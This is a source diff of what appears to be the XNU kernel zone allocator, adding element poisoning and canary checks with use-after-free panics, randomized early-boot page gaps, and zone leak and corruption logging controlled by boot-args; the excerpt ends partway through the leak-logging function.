+#if ZALLOC_ENABLE_POISONING
+       if (__improbable(zp_factor == 1)) {
+               poison = ZPM_POISON;
+       } else if (__probable(zp_factor != 0)) {
+               uint32_t *seqnop = &zpercpu_get(zone->z_stats)->zs_poison_seqno;
+               uint32_t seqno = os_atomic_load(seqnop, relaxed);
+               if (seqno == 0) {
+                       os_atomic_store(seqnop, zone_poison_count_init(zone), relaxed);
+                       poison = ZPM_POISON;
+               } else {
+                       os_atomic_store(seqnop, seqno - 1, relaxed);
+               }
+       }
+       if (poison == ZPM_POISON) {
+               /* memset_pattern{4|8} could help make this faster: <rdar://problem/4662004> */
+               for (size_t i = 0; i < elem_size / sizeof(vm_offset_t); i++) {
+                       ((vm_offset_t *)addr)[i] = ZONE_POISON;
+               }
+       } else {
+               /*
+                * Set a canary at the extremities.
+                *
+                * Zero first zp_min_size bytes of elements that aren't being
+                * poisoned.
+                *
+                * Element size is larger than zp_min_size in this path,
+                * zones with smaller elements have z_free_zeroes set.
+                */
+               *get_primary_ptr(addr) = zp_canary ^ (uintptr_t)addr;
+               bzero((void *)addr + sizeof(vm_offset_t),
+                   zp_min_size - sizeof(vm_offset_t));
+               *get_backup_ptr(addr, elem_size) = zp_canary ^ (uintptr_t)addr;
+
+               poison = ZPM_CANARY;
+       }
+#endif /* ZALLOC_ENABLE_POISONING */
+
+       return poison;
+}
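+
+/*
+ * Recap (illustrative) of the protection applied at free time above and the
+ * matching check performed at allocation time by zalloc_validate_element()
+ * below:
+ *
+ *     ZPM_ZERO   - whole element zeroed
+ *                  -> checked with memcmp_zero_ptr_aligned()
+ *     ZPM_POISON - whole element filled with ZONE_POISON
+ *                  -> checked by zalloc_validate_element_poison()
+ *     ZPM_CANARY - canaries at both ends, first zp_min_size bytes zeroed
+ *                  -> canary check, then zero check of the prefix
+ */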
+
+#if ZALLOC_ENABLE_POISONING
+
+__abortlike
+static void
+zalloc_uaf_panic(zone_t z, uintptr_t elem, size_t size, zprot_mode_t zpm)
+{
+       uint32_t esize = (uint32_t)zone_elem_size(z);
+       uint32_t first_offs = ~0u;
+       uintptr_t first_bits = 0, v;
+       char buf[1024];
+       int pos = 0;
+       const char *how;
+
+#if __LP64__
+#define ZPF  "0x%016lx"
+#else
+#define ZPF  "0x%08lx"
+#endif
+
+       buf[0] = '\0';
+
+       if (zpm == ZPM_CANARY) {
+               how = "canaries";
+
+               v = *get_primary_ptr(elem);
+               if (v != (elem ^ zp_canary)) {
+                       pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n"
+                           "%5d: got "ZPF", want "ZPF" (xor: "ZPF")",
+                           0, v, (elem ^ zp_canary), (v ^ elem ^ zp_canary));
+                       if (first_offs > 0) {
+                               first_offs = 0;
+                               first_bits = v;
+                       }
+               }
+
+               v = *get_backup_ptr(elem, esize);
+               if (v != (elem ^ zp_canary)) {
+                       pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n"
+                           "%5d: got "ZPF", want "ZPF" (xor: "ZPF")",
+                           esize - (int)sizeof(v), v, (elem ^ zp_canary),
+                           (v ^ elem ^ zp_canary));
+                       if (first_offs > esize - sizeof(v)) {
+                               first_offs = esize - sizeof(v);
+                               first_bits = v;
+                       }
+               }
+
+               for (uint32_t o = sizeof(v); o < zp_min_size; o += sizeof(v)) {
+                       if ((v = *(uintptr_t *)(elem + o)) == 0) {
+                               continue;
+                       }
+                       pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n"
+                           "%5d: "ZPF, o, v);
+                       if (first_offs > o) {
+                               first_offs = o;
+                               first_bits = v;
+                       }
+               }
+       } else if (zpm == ZPM_ZERO) {
+               how = "zero";
+
+               for (uint32_t o = 0; o < size; o += sizeof(v)) {
+                       if ((v = *(uintptr_t *)(elem + o)) == 0) {
+                               continue;
+                       }
+                       pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n"
+                           "%5d: "ZPF, o, v);
+                       if (first_offs > o) {
+                               first_offs = o;
+                               first_bits = v;
+                       }
+               }
+       } else {
+               how = "poison";
+
+               for (uint32_t o = 0; o < size; o += sizeof(v)) {
+                       if ((v = *(uintptr_t *)(elem + o)) == ZONE_POISON) {
+                               continue;
+                       }
+                       pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n"
+                           "%5d: "ZPF" (xor: "ZPF")",
+                           o, v, (v ^ ZONE_POISON));
+                       if (first_offs > o) {
+                               first_offs = o;
+                               first_bits = v;
+                       }
+               }
+       }
+
+       (panic)("[%s%s]: element modified after free "
+       "(off:%d, val:"ZPF", sz:%d, ptr:%p, prot:%s)%s",
+       zone_heap_name(z), zone_name(z),
+       first_offs, first_bits, esize, (void *)elem, how, buf);
+
+#undef ZPF
+}
+
+static void
+zalloc_validate_element_zero(zone_t zone, vm_offset_t elem, vm_size_t size)
+{
+       if (memcmp_zero_ptr_aligned((void *)elem, size)) {
+               zalloc_uaf_panic(zone, elem, size, ZPM_ZERO);
+       }
+       if (!zone->z_percpu) {
+               return;
+       }
+       for (size_t i = zpercpu_count(); --i > 0;) {
+               elem += PAGE_SIZE;
+               if (memcmp_zero_ptr_aligned((void *)elem, size)) {
+                       zalloc_uaf_panic(zone, elem, size, ZPM_ZERO);
+               }
+       }
+}
+
+#if __arm64__ || __arm__
+typedef __attribute__((ext_vector_type(2))) vm_offset_t zpair_t;
+#else
+typedef struct {
+       vm_offset_t x;
+       vm_offset_t y;
+} zpair_t;
+#endif
+
+
+__attribute__((noinline))
+static void
+zalloc_validate_element_poison(zone_t zone, vm_offset_t elem, vm_size_t size)
+{
+       vm_offset_t p = elem;
+       vm_offset_t end = elem + size;
+
+       const zpair_t poison = { ZONE_POISON, ZONE_POISON };
+       zpair_t a, b;
+
+       a.x = *(const vm_offset_t *)p;
+       a.y = *(const vm_offset_t *)(end - sizeof(vm_offset_t));
+
+       a.x ^= poison.x;
+       a.y ^= poison.y;
+
+       /*
+        * align p to the next double-wide boundary
+        * align end to the previous double-wide boundary
+        */
+       p = (p + sizeof(zpair_t) - 1) & -sizeof(zpair_t);
+       end &= -sizeof(zpair_t);
+
+       if ((end - p) % (2 * sizeof(zpair_t)) == 0) {
+               b.x = 0;
+               b.y = 0;
+       } else {
+               end -= sizeof(zpair_t);
+               b.x = ((zpair_t *)end)[0].x ^ poison.x;
+               b.y = ((zpair_t *)end)[0].y ^ poison.y;
+       }
+
+       for (; p < end; p += 2 * sizeof(zpair_t)) {
+               a.x |= ((zpair_t *)p)[0].x ^ poison.x;
+               a.y |= ((zpair_t *)p)[0].y ^ poison.y;
+               b.x |= ((zpair_t *)p)[1].x ^ poison.x;
+               b.y |= ((zpair_t *)p)[1].y ^ poison.y;
+       }
+
+       a.x |= b.x;
+       a.y |= b.y;
+
+       if (a.x || a.y) {
+               zalloc_uaf_panic(zone, elem, size, ZPM_POISON);
+       }
+}
+
+static void
+zalloc_validate_element(zone_t zone, vm_offset_t elem, vm_size_t size,
+    zprot_mode_t zpm)
+{
+       vm_offset_t *primary = get_primary_ptr(elem);
+       vm_offset_t *backup  = get_backup_ptr(elem, size);
+
+#if CONFIG_GZALLOC
+       if (zone->gzalloc_tracked) {
+               return;
+       }
+#endif /* CONFIG_GZALLOC */
+
+       if (zone->z_free_zeroes) {
+               return zalloc_validate_element_zero(zone, elem, size);
+       }
+
+       switch (zpm) {
+       case ZPM_AUTO:
+               if (*backup == 0) {
+                       size -= sizeof(vm_size_t);
+                       return zalloc_validate_element_zero(zone, elem, size);
+               }
+               if (*backup == ZONE_POISON) {
+                       size -= sizeof(vm_size_t);
+                       return zalloc_validate_element_poison(zone, elem, size);
+               }
+               OS_FALLTHROUGH;
+
+       case ZPM_CANARY:
+               if ((*primary ^ zp_canary) != elem || (*backup ^ zp_canary) != elem) {
+                       zalloc_uaf_panic(zone, elem, size, ZPM_CANARY);
+               }
+               *primary = *backup = 0;
+               size = zp_min_size;
+               OS_FALLTHROUGH;
+
+       case ZPM_ZERO:
+               return zalloc_validate_element_zero(zone, elem, size);
+
+       case ZPM_POISON:
+               return zalloc_validate_element_poison(zone, elem, size);
+       }
+}
+
+#endif /* ZALLOC_ENABLE_POISONING */
+#if ZALLOC_EARLY_GAPS
+
+__attribute__((noinline))
+static void
+zone_early_gap_drop(int n)
+{
+       while (n-- > 0) {
+               zone_t zone0 = &zone_array[0];
+               struct zone_page_metadata *meta = NULL;
+               vm_offset_t addr;
+               uint16_t pages;
+               vm_map_t map;
+
+               lck_mtx_lock(&zone_metadata_region_lck);
+
+               if (!zone_pva_is_null(zone0->z_pageq_va)) {
+                       meta = zone_meta_queue_pop_native(zone0,
+                           &zone0->z_pageq_va, &addr);
+                       map = zone_submaps[meta->zm_chunk_len];
+                       pages = meta->zm_alloc_size;
+                       __builtin_bzero(meta, sizeof(struct zone_page_metadata));
+               }
+
+               lck_mtx_unlock(&zone_metadata_region_lck);
+
+               if (!meta) {
+                       break;
+               }
+
+               kmem_free(map, addr, ptoa(pages));
+       }
+}
+
+static void
+zone_early_gap_add(zone_t z, uint16_t pages)
+{
+       struct zone_page_metadata *meta = NULL;
+       zone_t zone0 = &zone_array[0];
+       kern_return_t kr;
+       vm_offset_t addr;
+
+       kma_flags_t kmaflags = KMA_KOBJECT | KMA_ZERO | KMA_VAONLY;
+       if (z->z_submap_idx == Z_SUBMAP_IDX_GENERAL &&
+           z->kalloc_heap != KHEAP_ID_NONE) {
+               kmaflags |= KMA_KHEAP;
+       }
+
+       kr = kernel_memory_allocate(zone_submap(z), &addr, ptoa(pages), 0,
+           kmaflags, VM_KERN_MEMORY_ZONE);
+
+       if (kr != KERN_SUCCESS) {
+               panic("unable to allocate early gap (%d pages): %d", pages, kr);
+       }
+
+       zone_meta_populate(addr, ptoa(pages));
+
+       meta = zone_meta_from_addr(addr);
+       meta->zm_alloc_size = pages;
+       meta->zm_chunk_len = z->z_submap_idx;
+
+       lck_mtx_lock(&zone_metadata_region_lck);
+       zone_meta_queue_push(zone0, &zone0->z_pageq_va, meta);
+       lck_mtx_unlock(&zone_metadata_region_lck);
+}
+
+/*
+ * Roughly until pd1 is made, introduce random gaps
+ * between allocated pages.
+ *
+ * This way the early boot allocations are not in a completely
+ * predictable order and relative position.
+ *
+ * Those gaps are returned to the maps afterwards.
+ *
+ * We abuse the zone 0 (which is unused) "va" pageq to remember
+ * those ranges.
+ */
+__attribute__((noinline))
+static void
+zone_allocate_random_early_gap(zone_t z)
+{
+       int16_t pages = early_random() % 16;
+
+       /*
+        * 6%  of the time: drop 2 gaps
+        * 25% of the time: drop 1 gap
+        * 37% of the time: do nothing
+        * 18% of the time: add 1 gap
+        * 12% of the time: add 2 gaps
+        */
+       if (pages > 10) {
+               zone_early_gap_drop(pages == 15 ? 2 : 1);
+       }
+       if (pages < 5) {
+               /* values are 6, 8, 10, 12 or 14 */
+               zone_early_gap_add(z, 6 + 2 * pages);
+       }
+       if (pages < 2) {
+               zone_early_gap_add(z, 6 + early_random() % 16);
+       }
+}
+
+static inline void
+zone_cleanup_early_gaps_if_needed(void)
+{
+       if (__improbable(!zone_pva_is_null(zone_array[0].z_pageq_va))) {
+               zone_early_gap_drop(10);
+       }
+}
+
+#endif /* ZALLOC_EARLY_GAPS */
+
+static void
+zone_early_scramble_rr(zone_t zone, zone_stats_t zstats)
+{
+       int cpu = cpu_number();
+       zone_stats_t zs = zpercpu_get_cpu(zstats, cpu);
+       uint32_t bits;
+
+       bits = random_bool_gen_bits(&zone_bool_gen[cpu].zbg_bg,
+           zone_bool_gen[cpu].zbg_entropy, ZONE_ENTROPY_CNT, 8);
+
+       zs->zs_alloc_rr += bits;
+       zs->zs_alloc_rr %= zone->z_chunk_elems;
+}
+
+#endif /* !ZALLOC_TEST */
+#pragma mark Zone Leak Detection
+#if !ZALLOC_TEST
+
+/*
+ * Zone leak debugging code
+ *
+ * When enabled, this code keeps a log to track allocations to a particular zone that have not
+ * yet been freed.  Examining this log will reveal the source of a zone leak.  The log is allocated
+ * only when logging is enabled, so there is no effect on the system when it's turned off.  Logging is
+ * off by default.
+ *
+ * Enable the logging via the boot-args. Add the parameter "zlog=<zone>" to boot-args where <zone>
+ * is the name of the zone you wish to log.
+ *
+ * This code only tracks one zone, so you need to identify which one is leaking first.
+ * Generally, you'll know you have a leak when you get a "zalloc retry failed 3" panic from the zone
+ * garbage collector.  Note that the zone name printed in the panic message is not necessarily the one
+ * containing the leak.  So do a zprint from gdb and locate the zone with the bloated size.  This
+ * is most likely the problem zone, so set zlog in boot-args to this zone name, reboot and re-run the test.  The
+ * next time it panics with this message, examine the log using the kgmacros zstack, findoldest and countpcs.
+ * See the help in the kgmacros for usage info.
+ *
+ *
+ * Zone corruption logging
+ *
+ * Logging can also be used to help identify the source of a zone corruption.  First, identify the zone
+ * that is being corrupted, then add "-zc zlog=<zone name>" to the boot-args.  When -zc is used in conjunction
+ * with zlog, it changes the logging style to track both allocations and frees to the zone.  So when the
+ * corruption is detected, examining the log will show you the stack traces of the callers who last allocated
+ * and freed any particular element in the zone.  Use the findelem kgmacro with the address of the element that's been
+ * corrupted to examine its history.  This should lead to the source of the corruption.
+ */
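+
+/*
+ * Example boot-args (illustrative zone names and values only):
+ *
+ *     zlog=data.packet zrecs=2000       leak logging for the "data packet" zone
+ *     -zc zlog1=kalloc.48               corruption logging for the kalloc.48 zone
+ *
+ * A '.' in the boot-arg stands in for a space in the zone name, since
+ * boot-args cannot contain spaces.
+ */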
+
+/* Returns TRUE if we rolled over the counter at factor */
+__header_always_inline bool
+sample_counter(volatile uint32_t *count_p, uint32_t factor)
+{
+       uint32_t old_count, new_count = 0;
+       if (count_p != NULL) {
+               os_atomic_rmw_loop(count_p, old_count, new_count, relaxed, {
+                       new_count = old_count + 1;
+                       if (new_count >= factor) {
+                               new_count = 0;
+                       }
+               });
+       }
+
+       return new_count == 0;
+}
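+
+/*
+ * Usage sketch (illustrative, not part of this change): sample one event out
+ * of every `factor', e.g. one backtrace per 1000 allocations.  The counter
+ * and function names below are made up.
+ */
+#if 0 /* example only */
+static uint32_t example_sample_count;
+
+static void
+example_on_alloc(void)
+{
+       if (sample_counter(&example_sample_count, 1000)) {
+               /* roughly one out of every 1000 calls lands here */
+       }
+}
+#endif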
+
+#if ZONE_ENABLE_LOGGING
+/* Log allocations and frees to help debug a zone element corruption */
+static TUNABLE(bool, corruption_debug_flag, "-zc", false);
+
+#define MAX_NUM_ZONES_ALLOWED_LOGGING   10 /* Maximum 10 zones can be logged at once */
+
+static int  max_num_zones_to_log = MAX_NUM_ZONES_ALLOWED_LOGGING;
+static int  num_zones_logged = 0;
+
+/*
+ * The number of records in the log is configurable via the zrecs parameter in boot-args.  Set this to
+ * the number of records you want in the log.  For example, "zrecs=10" sets it to 10 records. Since this
+ * is the number of stacks suspected of leaking, we don't need many records.
+ */
+
+#if defined(__LP64__)
+#define ZRECORDS_MAX            2560            /* Max records allowed in the log */
+#else
+#define ZRECORDS_MAX            1536            /* Max records allowed in the log */
+#endif
+#define ZRECORDS_DEFAULT        1024            /* default records in log if zrecs is not specified in boot-args */
+
+static TUNABLE(uint32_t, log_records, "zrecs", ZRECORDS_DEFAULT);
+
+static void
+zone_enable_logging(zone_t z)
+{
+       z->zlog_btlog = btlog_create(log_records, MAX_ZTRACE_DEPTH,
+           (corruption_debug_flag == FALSE) /* caller_will_remove_entries_for_element? */);
+
+       if (z->zlog_btlog) {
+               printf("zone: logging started for zone %s%s\n",
+                   zone_heap_name(z), z->z_name);
+       } else {
+               printf("zone: couldn't allocate memory for zrecords, turning off zleak logging\n");
+               z->zone_logging = false;
+       }
+}
+
+/**
+ * @function zone_setup_logging
+ *
+ * @abstract
+ * Optionally sets up a zone for logging.
+ *
+ * @discussion
+ * We recognize two boot-args:
+ *
+ *     zlog=<zone_to_log>
+ *     zrecs=<num_records_in_log>
+ *
+ * The zlog arg is used to specify the zone name that should be logged,
+ * and zrecs is used to control the size of the log.
+ *
+ * If zrecs is not specified, a default value is used.
+ */
+static void
+zone_setup_logging(zone_t z)
+{
+       char zone_name[MAX_ZONE_NAME]; /* Temp. buffer for the zone name */
+       char zlog_name[MAX_ZONE_NAME]; /* Temp. buffer to create the strings zlog1, zlog2 etc... */
+       char zlog_val[MAX_ZONE_NAME];  /* the zone name we're logging, if any */
+
+       /*
+        * Don't allow more than ZRECORDS_MAX records even if the user asked for more.
+        *
+        * This prevents accidentally hogging too much kernel memory
+        * and making the system unusable.
+        */
+       if (log_records > ZRECORDS_MAX) {
+               log_records = ZRECORDS_MAX;
+       }
+
+       /*
+        * Append kalloc heap name to zone name (if zone is used by kalloc)
+        */
+       snprintf(zone_name, MAX_ZONE_NAME, "%s%s", zone_heap_name(z), z->z_name);
+
+       /* zlog0 isn't allowed. */
+       for (int i = 1; i <= max_num_zones_to_log; i++) {
+               snprintf(zlog_name, MAX_ZONE_NAME, "zlog%d", i);
+
+               if (PE_parse_boot_argn(zlog_name, zlog_val, sizeof(zlog_val)) &&
+                   track_this_zone(zone_name, zlog_val)) {
+                       z->zone_logging = true;
+                       num_zones_logged++;
+                       break;
+               }
+       }
+
+       /*
+        * Backwards compatibility with the old boot-arg used to specify single
+        * zone logging, i.e. "zlog".  This check needs to happen after the
+        * newer zlogN checks because the "zlog" prefix will match all of the
+        * zlogN boot-args.
+        */
+       if (!z->zone_logging &&
+           PE_parse_boot_argn("zlog", zlog_val, sizeof(zlog_val)) &&
+           track_this_zone(zone_name, zlog_val)) {
+               z->zone_logging = true;
+               num_zones_logged++;
+       }
+
+
+       /*
+        * If we want to log a zone, see if we need to allocate buffer space for
+        * the log.
+        *
+        * Some vm related zones are zinit'ed before we can do a kmem_alloc, so
+        * we have to defer allocation in that case.
+        *
+        * zone_init() will finish the job.
+        *
+        * If we want to log one of the VM related zones that's set up early on,
+        * we will skip allocation of the log until zinit is called again later
+        * on some other zone.
+        */
+       if (z->zone_logging && startup_phase >= STARTUP_SUB_KMEM_ALLOC) {
+               zone_enable_logging(z);
+       }
+}
+
+/*
+ * Each record in the log contains a pointer to the zone element it refers to,
+ * and a small array to hold the pc's from the stack trace.  A
+ * record is added to the log each time a zalloc() is done in the zone_of_interest.  For leak debugging,
+ * the record is cleared when a zfree() is done.  For corruption debugging, the log tracks both allocs and frees.
+ * If the log fills, old records are replaced as if it were a circular buffer.
+ */
+
+
+/*
+ * Decide if we want to log this zone by doing a string compare between a zone name and the name
+ * of the zone to log. Return true if the strings are equal, false otherwise.  Because it's not
+ * possible to include spaces in strings passed in via the boot-args, a period in the logname will
+ * match a space in the zone name.
+ */
+
+/*
+ * Test if we want to log this zalloc/zfree event.  We log if this is the zone we're interested in and
+ * the buffer for the records has been allocated.
+ */
+
+#define DO_LOGGING(z)           (z->zlog_btlog != NULL)
+#else /* !ZONE_ENABLE_LOGGING */
+#define DO_LOGGING(z)           0
+#endif /* !ZONE_ENABLE_LOGGING */
+#if CONFIG_ZLEAKS
+
+/*
+ * The zone leak detector, abbreviated 'zleak', keeps track of a subset of the currently outstanding
+ * allocations made by the zone allocator.  Every zleak_sample_factor allocations in each zone, we capture a
+ * backtrace.  Every free, we examine the table and determine if the allocation was being tracked,
+ * and stop tracking it if it was being tracked.
+ *
+ * We track the allocations in the zallocations hash table, which stores the address that was returned from
+ * the zone allocator.  Each stored entry in the zallocations table points to an entry in the ztraces table, which
+ * stores the backtrace associated with that allocation.  This provides uniquing for the relatively large
+ * backtraces - we don't store them more than once.
+ *
+ * Data collection begins when the zone map is 50% full, and only occurs for zones that are taking up
+ * a large amount of virtual space.
+ */
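+
+/*
+ * Illustrative sketch of how the two tables relate (the globals referenced
+ * here are declared further down in this file):
+ *
+ *     zallocations[hashaddr(addr, zleak_alloc_buckets)]
+ *         .za_element     = addr
+ *         .za_trace_index --> ztraces[hashbacktrace(bt, depth, zleak_trace_buckets)]
+ *                                 .zt_stack = backtrace, each unique trace stored once
+ *                                 .zt_size  = outstanding bytes attributed to that trace
+ */
+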
+#define ZLEAK_STATE_ENABLED             0x01    /* Zone leak monitoring should be turned on if zone_map fills up. */
+#define ZLEAK_STATE_ACTIVE              0x02    /* We are actively collecting traces. */
+#define ZLEAK_STATE_ACTIVATING          0x04    /* Some thread is doing setup; others should move along. */
+#define ZLEAK_STATE_FAILED              0x08    /* Attempt to allocate tables failed.  We will not try again. */
+static uint32_t        zleak_state = 0;                 /* State of collection, as above */
+static unsigned int    zleak_sample_factor = 1000;      /* Allocations per sample attempt */
+
+bool            panic_include_ztrace    = FALSE;        /* Enable zleak logging on panic */
+vm_size_t       zleak_global_tracking_threshold;        /* Size of zone map at which to start collecting data */
+vm_size_t       zleak_per_zone_tracking_threshold;      /* Size a zone will have before we will collect data on it */
+
+/*
+ * Counters for allocation statistics.
+ */
+
+/* Times two active records want to occupy the same spot */
+static unsigned int z_alloc_collisions = 0;
+static unsigned int z_trace_collisions = 0;
+
+/* Times a new record lands on a spot previously occupied by a freed allocation */
+static unsigned int z_alloc_overwrites = 0;
+static unsigned int z_trace_overwrites = 0;
+
+/* Times a new alloc or trace is put into the hash table */
+static unsigned int z_alloc_recorded   = 0;
+static unsigned int z_trace_recorded   = 0;
+
+/* Times zleak_log returned false due to not being able to acquire the lock */
+static unsigned int z_total_conflicts  = 0;
+
+/*
+ * Structure for keeping track of an allocation
+ * An allocation bucket is in use if its element is not NULL
+ */
+struct zallocation {
+       uintptr_t               za_element;             /* the element that was zalloc'ed or zfree'ed, NULL if bucket unused */
+       vm_size_t               za_size;                        /* how much memory did this allocation take up? */
+       uint32_t                za_trace_index; /* index into ztraces for backtrace associated with allocation */
+       /* TODO: #if this out */
+       uint32_t                za_hit_count;           /* for determining effectiveness of hash function */
+};
+
+/* Size must be a power of two for the zhash to be able to just mask off bits instead of mod */
+static uint32_t zleak_alloc_buckets = CONFIG_ZLEAK_ALLOCATION_MAP_NUM;
+static uint32_t zleak_trace_buckets = CONFIG_ZLEAK_TRACE_MAP_NUM;
+
+vm_size_t zleak_max_zonemap_size;
+
+/* Hashmaps of allocations and their corresponding traces */
+static struct zallocation*      zallocations;
+static struct ztrace*           ztraces;
+
+/* not static so that panic can see this, see kern/debug.c */
+struct ztrace*                          top_ztrace;
+
+/* Lock to protect zallocations, ztraces, and top_ztrace from concurrent modification. */
+static LCK_GRP_DECLARE(zleak_lock_grp, "zleak_lock");
+static LCK_SPIN_DECLARE(zleak_lock, &zleak_lock_grp);
+
+/*
+ * Initializes the zone leak monitor.  Called from zone_init()
+ */
+__startup_func
+static void
+zleak_init(vm_size_t max_zonemap_size)
+{
+       char                    scratch_buf[16];
+       boolean_t               zleak_enable_flag = FALSE;
+
+       zleak_max_zonemap_size = max_zonemap_size;
+       zleak_global_tracking_threshold = max_zonemap_size / 2;
+       zleak_per_zone_tracking_threshold = zleak_global_tracking_threshold / 8;
+
+#if CONFIG_EMBEDDED
+       if (PE_parse_boot_argn("-zleakon", scratch_buf, sizeof(scratch_buf))) {
+               zleak_enable_flag = TRUE;
+               printf("zone leak detection enabled\n");
+       } else {
+               zleak_enable_flag = FALSE;
+               printf("zone leak detection disabled\n");
+       }
+#else /* CONFIG_EMBEDDED */
+       /* -zleakoff (flag to disable zone leak monitor) */
+       if (PE_parse_boot_argn("-zleakoff", scratch_buf, sizeof(scratch_buf))) {
+               zleak_enable_flag = FALSE;
+               printf("zone leak detection disabled\n");
+       } else {
+               zleak_enable_flag = TRUE;
+               printf("zone leak detection enabled\n");
+       }
+#endif /* CONFIG_EMBEDDED */
+
+       /* zfactor=XXXX (override how often to sample the zone allocator) */
+       if (PE_parse_boot_argn("zfactor", &zleak_sample_factor, sizeof(zleak_sample_factor))) {
+               printf("Zone leak factor override: %u\n", zleak_sample_factor);
+       }
+
+       /* zleak-allocs=XXXX (override number of buckets in zallocations) */
+       if (PE_parse_boot_argn("zleak-allocs", &zleak_alloc_buckets, sizeof(zleak_alloc_buckets))) {
+               printf("Zone leak alloc buckets override: %u\n", zleak_alloc_buckets);
+               /* uses the 'is power of 2' trick: (0x01000 & 0x00FFF) == 0 */
+               if (zleak_alloc_buckets == 0 || (zleak_alloc_buckets & (zleak_alloc_buckets - 1))) {
+                       printf("Override isn't a power of two, bad things might happen!\n");
+               }
+       }
+
+       /* zleak-traces=XXXX (override number of buckets in ztraces) */
+       if (PE_parse_boot_argn("zleak-traces", &zleak_trace_buckets, sizeof(zleak_trace_buckets))) {
+               printf("Zone leak trace buckets override: %u\n", zleak_trace_buckets);
+               /* uses the 'is power of 2' trick: (0x01000 & 0x00FFF) == 0 */
+               if (zleak_trace_buckets == 0 || (zleak_trace_buckets & (zleak_trace_buckets - 1))) {
+                       printf("Override isn't a power of two, bad things might happen!\n");
+               }
+       }
+
+       if (zleak_enable_flag) {
+               zleak_state = ZLEAK_STATE_ENABLED;
+       }
+}
+
+/*
+ * Support for kern.zleak.active sysctl - a simplified
+ * version of the zleak_state variable.
+ */
+int
+get_zleak_state(void)
+{
+       if (zleak_state & ZLEAK_STATE_FAILED) {
+               return -1;
+       }
+       if (zleak_state & ZLEAK_STATE_ACTIVE) {
+               return 1;
+       }
+       return 0;
+}
+
+kern_return_t
+zleak_activate(void)
+{
+       kern_return_t retval;
+       vm_size_t z_alloc_size = zleak_alloc_buckets * sizeof(struct zallocation);
+       vm_size_t z_trace_size = zleak_trace_buckets * sizeof(struct ztrace);
+       void *allocations_ptr = NULL;
+       void *traces_ptr = NULL;
+
+       /* Only one thread attempts to activate at a time */
+       if (zleak_state & (ZLEAK_STATE_ACTIVE | ZLEAK_STATE_ACTIVATING | ZLEAK_STATE_FAILED)) {
+               return KERN_SUCCESS;
+       }
+
+       /* Indicate that we're doing the setup */
+       lck_spin_lock(&zleak_lock);
+       if (zleak_state & (ZLEAK_STATE_ACTIVE | ZLEAK_STATE_ACTIVATING | ZLEAK_STATE_FAILED)) {
+               lck_spin_unlock(&zleak_lock);
+               return KERN_SUCCESS;
+       }
+
+       zleak_state |= ZLEAK_STATE_ACTIVATING;
+       lck_spin_unlock(&zleak_lock);
+
+       /* Allocate and zero tables */
+       retval = kmem_alloc_kobject(kernel_map, (vm_offset_t*)&allocations_ptr, z_alloc_size, VM_KERN_MEMORY_DIAG);
+       if (retval != KERN_SUCCESS) {
+               goto fail;
+       }
+
+       retval = kmem_alloc_kobject(kernel_map, (vm_offset_t*)&traces_ptr, z_trace_size, VM_KERN_MEMORY_DIAG);
+       if (retval != KERN_SUCCESS) {
+               goto fail;
+       }
+
+       bzero(allocations_ptr, z_alloc_size);
+       bzero(traces_ptr, z_trace_size);
+
+       /* Everything's set.  Install tables, mark active. */
+       zallocations = allocations_ptr;
+       ztraces = traces_ptr;
+
+       /*
+        * Initialize the top_ztrace to the first entry in ztraces,
+        * so we don't have to check for null in zleak_log
+        */
+       top_ztrace = &ztraces[0];
+
+       /*
+        * Note that we do need a barrier between installing
+        * the tables and setting the active flag, because the zfree()
+        * path accesses the table without a lock if we're active.
+        */
+       lck_spin_lock(&zleak_lock);
+       zleak_state |= ZLEAK_STATE_ACTIVE;
+       zleak_state &= ~ZLEAK_STATE_ACTIVATING;
+       lck_spin_unlock(&zleak_lock);
+
+       return 0;
+
+fail:
+       /*
+        * If we fail to allocate memory, don't further tax
+        * the system by trying again.
+        */
+       lck_spin_lock(&zleak_lock);
+       zleak_state |= ZLEAK_STATE_FAILED;
+       zleak_state &= ~ZLEAK_STATE_ACTIVATING;
+       lck_spin_unlock(&zleak_lock);
+
+       if (allocations_ptr != NULL) {
+               kmem_free(kernel_map, (vm_offset_t)allocations_ptr, z_alloc_size);
+       }
+
+       if (traces_ptr != NULL) {
+               kmem_free(kernel_map, (vm_offset_t)traces_ptr, z_trace_size);
+       }
+
+       return retval;
+}
+
+static inline void
+zleak_activate_if_needed(void)
+{
+       if (__probable((zleak_state & ZLEAK_STATE_ENABLED) == 0)) {
+               return;
+       }
+       if (zleak_state & ZLEAK_STATE_ACTIVE) {
+               return;
+       }
+       if (zone_submaps_approx_size() < zleak_global_tracking_threshold) {
+               return;
+       }
+
+       kern_return_t kr = zleak_activate();
+       if (kr != KERN_SUCCESS) {
+               printf("Failed to activate live zone leak debugging (%d).\n", kr);
+       }
+}
+
+static inline void
+zleak_track_if_needed(zone_t z)
+{
+       if (__improbable(zleak_state & ZLEAK_STATE_ACTIVE)) {
+               if (!z->zleak_on &&
+                   zone_size_wired(z) >= zleak_per_zone_tracking_threshold) {
+                       z->zleak_on = true;
+               }
+       }
+}
+
+/*
+ * TODO: What about allocations that never get deallocated,
+ * especially ones with unique backtraces? Should we wait to record
+ * until after boot has completed?
+ * (How many persistent zallocs are there?)
+ */
+
 /*
- * Clear out the old next pointer and backup to avoid leaking the zone
- * poisoning cookie and so that only values on the freelist have a valid
- * cookie.
+ * This function records the allocation in the allocations table,
+ * and stores the associated backtrace in the traces table
+ * (or just increments the refcount if the trace is already recorded).
+ * If the allocation slot is in use, the old allocation is replaced with the new allocation, and
+ * the associated trace's refcount is decremented.
+ * If the trace slot is in use by a different trace, it simply returns.
+ * The refcount is incremented by the amount of memory the allocation consumes.
+ * The return value indicates whether to try again next time.
  */
-void
-zone_clear_freelist_pointers(zone_t zone, vm_offset_t addr)
+static boolean_t
+zleak_log(uintptr_t* bt,
+    uintptr_t addr,
+    uint32_t depth,
+    vm_size_t allocation_size)
+{
+       /* Quit if there's someone else modifying the hash tables */
+       if (!lck_spin_try_lock(&zleak_lock)) {
+               z_total_conflicts++;
+               return FALSE;
+       }
+
+       struct zallocation* allocation  = &zallocations[hashaddr(addr, zleak_alloc_buckets)];
+
+       uint32_t trace_index = hashbacktrace(bt, depth, zleak_trace_buckets);
+       struct ztrace* trace = &ztraces[trace_index];
+
+       allocation->za_hit_count++;
+       trace->zt_hit_count++;
+
+       /*
+        * If the allocation bucket we want to be in is occupied, and if the occupier
+        * has the same trace as us, just bail.
+        */
